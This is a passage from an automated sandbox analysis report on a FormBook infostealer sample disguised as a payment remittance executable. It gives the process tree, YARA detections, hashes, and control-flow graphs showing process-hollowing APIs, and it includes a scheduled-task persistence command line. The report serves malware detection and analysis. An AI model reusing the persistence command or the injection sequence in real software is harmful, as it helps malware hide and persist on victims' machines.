                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:06:42:09
                                          Start date:27/05/2024
                                          Path:C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
                                          Imagebase:0xca0000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:10
                                          Start time:06:42:10
                                          Start date:27/05/2024
                                          Path:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Imagebase:0x760000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 42%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:11
                                          Start time:06:42:12
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:06:42:14
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"
                                          Imagebase:0x210000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:06:42:15
                                          Start date:27/05/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:14
                                          Start time:06:42:15
                                          Start date:27/05/2024
                                          Path:C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
                                          Imagebase:0xf60000
                                          File size:694'272 bytes
                                          MD5 hash:7BFC6728400D041F90F6DD5B3F67AA38
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:16
                                          Start time:06:42:29
                                          Start date:27/05/2024
                                          Path:C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe"
                                          Imagebase:0xf00000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:17
                                          Start time:06:42:30
                                          Start date:27/05/2024
                                          Path:C:\Windows\SysWOW64\winver.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\winver.exe"
                                          Imagebase:0x240000
                                          File size:57'344 bytes
                                          MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:18
                                          Start time:06:42:43
                                          Start date:27/05/2024
                                          Path:C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe"
                                          Imagebase:0xf00000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:21
                                          Start time:06:42:55
                                          Start date:27/05/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff79f9e0000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                            Execution Graph

                                            Execution Coverage:9.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:279
                                            Total number of Limit Nodes:13
29914->29913 29915->29905 29919 e3b054 29918->29919 29921 e3b079 29919->29921 29926 e3a130 29919->29926 29921->29914 29923 e3b054 29922->29923 29924 e3a130 LoadLibraryExW 29923->29924 29925 e3b079 29923->29925 29924->29925 29925->29914 29927 e3b220 LoadLibraryExW 29926->29927 29929 e3b299 29927->29929 29929->29921 29932 e3cf35 29930->29932 29933 e3cf6f 29932->29933 29934 e3bae0 29932->29934 29933->29901 29935 e3bae5 29934->29935 29937 e3dc88 29935->29937 29938 e3d2dc 29935->29938 29937->29937 29939 e3d2e7 29938->29939 29940 e35cc4 2 API calls 29939->29940 29941 e3dcf7 29940->29941 29941->29937

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 295 52b8b50-52b8b80 [remaining node and edge list omitted; no API calls referenced]
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-2875722158
                                            • Opcode ID: 02057cca6eaecd746c43f2f00dd03a3235fae7b59015c616b6bfafd49fa5e3f2
                                            • Instruction ID: ca9c1153e053ae5a2e63816d5cdf6968b18845a29f7c72c67d6926d567ab1e03
                                            • Opcode Fuzzy Hash: 02057cca6eaecd746c43f2f00dd03a3235fae7b59015c616b6bfafd49fa5e3f2
                                            • Instruction Fuzzy Hash: 0F71BD71A2410ACBEB18DF68C440BFDBBBABF44390F088066E45EEB291D6F49D418B51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 372 e3d031-e3d0cf GetCurrentProcess 376 e3d0d1-e3d0d7 372->376 377 e3d0d8-e3d10c GetCurrentThread 372->377 376->377 378 e3d115-e3d149 GetCurrentProcess 377->378 379 e3d10e-e3d114 377->379 380 e3d152-e3d16d call e3d618 378->380 381 e3d14b-e3d151 378->381 379->378 385 e3d173-e3d1a2 GetCurrentThreadId 380->385 381->380 386 e3d1a4-e3d1aa 385->386 387 e3d1ab-e3d20d 385->387 386->387
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D0BE
                                            • GetCurrentThread.KERNEL32 ref: 00E3D0FB
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D138
                                            • GetCurrentThreadId.KERNEL32 ref: 00E3D191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 4d4b302effe22ec969833f73f86e95f69b2c46e32c3b2d633d99d36efcce8753
                                            • Instruction ID: d2dbaa5cd50359e4a77a8689a24b799504a1fd7010fd02a741d2073f221e714e
                                            • Opcode Fuzzy Hash: 4d4b302effe22ec969833f73f86e95f69b2c46e32c3b2d633d99d36efcce8753
                                            • Instruction Fuzzy Hash: 475149B09016498FDB14DFA9D949BEEBFF1EF88304F208459E409A7360D7789984CF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 394 e3d040-e3d0cf GetCurrentProcess 398 e3d0d1-e3d0d7 394->398 399 e3d0d8-e3d10c GetCurrentThread 394->399 398->399 400 e3d115-e3d149 GetCurrentProcess 399->400 401 e3d10e-e3d114 399->401 402 e3d152-e3d16d call e3d618 400->402 403 e3d14b-e3d151 400->403 401->400 407 e3d173-e3d1a2 GetCurrentThreadId 402->407 403->402 408 e3d1a4-e3d1aa 407->408 409 e3d1ab-e3d20d 407->409 408->409
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D0BE
                                            • GetCurrentThread.KERNEL32 ref: 00E3D0FB
                                            • GetCurrentProcess.KERNEL32 ref: 00E3D138
                                            • GetCurrentThreadId.KERNEL32 ref: 00E3D191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 3c882239895f1fa9b283f8013861cced1a34aff2662e64402ba1a0757b133c08
                                            • Instruction ID: 9b4bf27c84b41bfde2610ebd86c891a4cb26c0a070ba52f2412a50474583379e
                                            • Opcode Fuzzy Hash: 3c882239895f1fa9b283f8013861cced1a34aff2662e64402ba1a0757b133c08
                                            • Instruction Fuzzy Hash: 3D5159B09012498FDB14EFA9D948BAEBFF5EF88304F208459E409A7350D778A984CF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 416 52b8b4a-52b8b80 [remaining node and edge list omitted; no API calls referenced]
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q
                                            • API String ID: 0-2603884067
                                            • Opcode ID: a636ced5f991cbf4097a97e04f7a7f9f7652af0bf0eabbc737ed6d67acd19caa
                                            • Instruction ID: b8bcca481b977abf21db0b61233e2a312c696876bae316f0bfe74af75caf0ac1
                                            • Opcode Fuzzy Hash: a636ced5f991cbf4097a97e04f7a7f9f7652af0bf0eabbc737ed6d67acd19caa
                                            • Instruction Fuzzy Hash: 7C61BD71A28116CFEB14CF68C840BFDB7BABF44391F088166E45EEB291D3F499418B51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 582 52be4b8-52be4db 583 52be4dd 582->583 584 52be4e2-52be61c call 52be488 582->584 583->584 597 52be52a-52be52f 584->597 598 52be5de-52be5df 584->598 599 52be6c7-52be6d6 597->599 600 52be535-52be536 597->600 598->597 606 52be621-52be625 599->606 600->599 607 52be53b-52be6c2 606->607 608 52be62b-52be6aa 606->608 607->606 618 52be6b3-52be6bd 608->618
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: fab900c7683fd0e37a1c233d9eefb88bb2b50e483eba9ff0d834863d684aeba6
                                            • Instruction ID: ba2e38bff2d38a08fc85b6316ff8cf028cf32adbb6256d472bc5be7dc64458c1
                                            • Opcode Fuzzy Hash: fab900c7683fd0e37a1c233d9eefb88bb2b50e483eba9ff0d834863d684aeba6
                                            • Instruction Fuzzy Hash: 6B71B474E14208CFDB08DFA9C984AEDBBFABF89300F109129D41AAB355DB706946CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 619 52b7180-52b71a6 620 52b71ab-52b71ae 619->620 621 52b71b0 620->621 622 52b71b7-52b724c 620->622 621->622 623 52b720d 621->623 624 52b71dd-52b71e3 621->624 625 52b723c-52b7241 621->625 626 52b71d3-52b71db 621->626 627 52b7232-52b7237 621->627 628 52b7210-52b7215 621->628 629 52b7217-52b722a 621->629 630 52b71c4 621->630 622->624 623->628 635 52b71ed-52b7202 624->635 626->620 627->620 628->620 629->627 634 52b71cc-52b71d1 630->634 634->620 638 52b724e-52b7256 635->638 639 52b7204-52b720b 635->639 639->620
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2091521925.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_52b0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq$Haq
                                            • API String ID: 0-4016896955
                                            • Opcode ID: 276b15fb8e16db2dae725ee0762d89d1bdd6bb61a4bdaeb655ddd5d71179b86b
                                            • Instruction ID: 5a344ee534da6240f6d9e214b00998f23b860f855f7e9e2e8244da56a5b14bfa
                                            • Opcode Fuzzy Hash: 276b15fb8e16db2dae725ee0762d89d1bdd6bb61a4bdaeb655ddd5d71179b86b
                                            • Instruction Fuzzy Hash: EE21A4702283809FE7219729EC55FAB7EB9EFC2750F084566F1538A282C6F49E01C771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 652 6be512d-6be51cd 654 6be51cf-6be51d9 652->654 655 6be5206-6be5226 652->655 654->655 656 6be51db-6be51dd 654->656 662 6be525f-6be528e 655->662 663 6be5228-6be5232 655->663 657 6be51df-6be51e9 656->657 658 6be5200-6be5203 656->658 660 6be51ed-6be51fc 657->660 661 6be51eb 657->661 658->655 660->660 664 6be51fe 660->664 661->660 671 6be52c7-6be5381 CreateProcessA 662->671 672 6be5290-6be529a 662->672 663->662 665 6be5234-6be5236 663->665 664->658 666 6be5238-6be5242 665->666 667 6be5259-6be525c 665->667 669 6be5246-6be5255 666->669 670 6be5244 666->670 667->662 669->669 673 6be5257 669->673 670->669 683 6be538a-6be5410 671->683 684 6be5383-6be5389 671->684 672->671 674 6be529c-6be529e 672->674 673->667 676 6be52a0-6be52aa 674->676 677 6be52c1-6be52c4 674->677 678 6be52ae-6be52bd 676->678 679 6be52ac 676->679 677->671 678->678 681 6be52bf 678->681 679->678 681->677 694 6be5412-6be5416 683->694 695 6be5420-6be5424 683->695 684->683 694->695 698 6be5418 694->698 696 6be5426-6be542a 695->696 697 6be5434-6be5438 695->697 696->697 699 6be542c 696->699 700 6be543a-6be543e 697->700 701 6be5448-6be544c 697->701 698->695 699->697 700->701 702 6be5440 700->702 703 6be545e-6be5465 701->703 704 6be544e-6be5454 701->704 702->701 705 6be547c 703->705 706 6be5467-6be5476 703->706 704->703 707 6be547d 705->707 706->705 707->707
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BE536E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 1ea41d271530a0c45eb6827f5150451a3a93837661fb2e13f76ca24cd3303010
                                            • Instruction ID: 5e02e256a5f8448402efefef42d16a8240a672a6738f9c2aac54b4f8d87f52b8
                                            • Opcode Fuzzy Hash: 1ea41d271530a0c45eb6827f5150451a3a93837661fb2e13f76ca24cd3303010
                                            • Instruction Fuzzy Hash: E5A18FB2D00219CFDB64CF68C841BDDBBB2FF44304F1485AAE809A7254DB759985CF92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 709 6be5138-6be51cd 711 6be51cf-6be51d9 709->711 712 6be5206-6be5226 709->712 711->712 713 6be51db-6be51dd 711->713 719 6be525f-6be528e 712->719 720 6be5228-6be5232 712->720 714 6be51df-6be51e9 713->714 715 6be5200-6be5203 713->715 717 6be51ed-6be51fc 714->717 718 6be51eb 714->718 715->712 717->717 721 6be51fe 717->721 718->717 728 6be52c7-6be5381 CreateProcessA 719->728 729 6be5290-6be529a 719->729 720->719 722 6be5234-6be5236 720->722 721->715 723 6be5238-6be5242 722->723 724 6be5259-6be525c 722->724 726 6be5246-6be5255 723->726 727 6be5244 723->727 724->719 726->726 730 6be5257 726->730 727->726 740 6be538a-6be5410 728->740 741 6be5383-6be5389 728->741 729->728 731 6be529c-6be529e 729->731 730->724 733 6be52a0-6be52aa 731->733 734 6be52c1-6be52c4 731->734 735 6be52ae-6be52bd 733->735 736 6be52ac 733->736 734->728 735->735 738 6be52bf 735->738 736->735 738->734 751 6be5412-6be5416 740->751 752 6be5420-6be5424 740->752 741->740 751->752 755 6be5418 751->755 753 6be5426-6be542a 752->753 754 6be5434-6be5438 752->754 753->754 756 6be542c 753->756 757 6be543a-6be543e 754->757 758 6be5448-6be544c 754->758 755->752 756->754 757->758 759 6be5440 757->759 760 6be545e-6be5465 758->760 761 6be544e-6be5454 758->761 759->758 762 6be547c 760->762 763 6be5467-6be5476 760->763 761->760 764 6be547d 762->764 763->762 764->764
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BE536E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 8b5434930aa07e22f13500692dc753c8464a055ea33d1d92905ecb8a0f0e8675
                                            • Instruction ID: e2168900828a46cae2885c169e5eaa6a3ba2c625f93ce6b90ff7967e86bc992f
                                            • Opcode Fuzzy Hash: 8b5434930aa07e22f13500692dc753c8464a055ea33d1d92905ecb8a0f0e8675
                                            • Instruction Fuzzy Hash: 6C918FB1D00219CFDB64CF68C841BDDBBB2FF48314F1485AAE809A7244DB759985CF92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 766 e3ada8-e3adb7 767 e3ade3-e3ade7 766->767 768 e3adb9-e3adc6 call e3a0cc 766->768 770 e3adfb-e3ae3c 767->770 771 e3ade9-e3adf3 767->771 774 e3adc8 768->774 775 e3addc 768->775 777 e3ae49-e3ae57 770->777 778 e3ae3e-e3ae46 770->778 771->770 822 e3adce call e3b040 774->822 823 e3adce call e3b030 774->823 775->767 779 e3ae7b-e3ae7d 777->779 780 e3ae59-e3ae5e 777->780 778->777 785 e3ae80-e3ae87 779->785 782 e3ae60-e3ae67 call e3a0d8 780->782 783 e3ae69 780->783 781 e3add4-e3add6 781->775 784 e3af18-e3afd8 781->784 787 e3ae6b-e3ae79 782->787 783->787 817 e3afe0-e3b00b GetModuleHandleW 784->817 818 e3afda-e3afdd 784->818 788 e3ae94-e3ae9b 785->788 789 e3ae89-e3ae91 785->789 787->785 792 e3aea8-e3aeaa call e3a0e8 788->792 793 e3ae9d-e3aea5 788->793 789->788 795 e3aeaf-e3aeb1 792->795 793->792 797 e3aeb3-e3aebb 795->797 798 e3aebe-e3aec3 795->798 797->798 799 e3aee1-e3aeee 798->799 800 e3aec5-e3aecc 798->800 807 e3af11-e3af17 799->807 808 e3aef0-e3af0e 799->808 800->799 802 e3aece-e3aede call e3a0f8 call e3a108 800->802 802->799 808->807 819 e3b014-e3b028 817->819 820 e3b00d-e3b013 817->820 818->817 820->819 822->781 823->781
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 2a79c09b42d02f4495beb9d32c2bd08acecafe25ba397c93038a9ee2a67c64f9
                                            • Instruction ID: 65c04f18239d874fb686773ae76a514fd8ae1be5f6cd793c3851b7f4c8b3fff9
                                            • Opcode Fuzzy Hash: 2a79c09b42d02f4495beb9d32c2bd08acecafe25ba397c93038a9ee2a67c64f9
                                            • Instruction Fuzzy Hash: E4815570A00B058FD728DF2AC449B5ABBF5FF88704F04892DD48AE7A50D735E989CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 824 e344b0-e359d9 CreateActCtxA 827 e359e2-e35a3c 824->827 828 e359db-e359e1 824->828 835 e35a4b-e35a4f 827->835 836 e35a3e-e35a41 827->836 828->827 837 e35a51-e35a5d 835->837 838 e35a60 835->838 836->835 837->838 840 e35a61 838->840 840->840
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c40380616cf6b65e02e58dea80f9ac85a3cf965a025d0b3d1fb7b06655a2c21f
                                            • Instruction ID: 5fc4c4e0c0839a62fe12a4a46d67e19f2ee287fe4f82f351c34a21e8c8a0ef42
                                            • Opcode Fuzzy Hash: c40380616cf6b65e02e58dea80f9ac85a3cf965a025d0b3d1fb7b06655a2c21f
                                            • Instruction Fuzzy Hash: 7F41F2B1C00719CBDB24DFA9C888B9DBBF5FF89304F20815AD408AB255DBB56945CF90
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E359C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e30000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BE4F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BE4F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BE495E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2092962327.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6be0000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2081782528.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
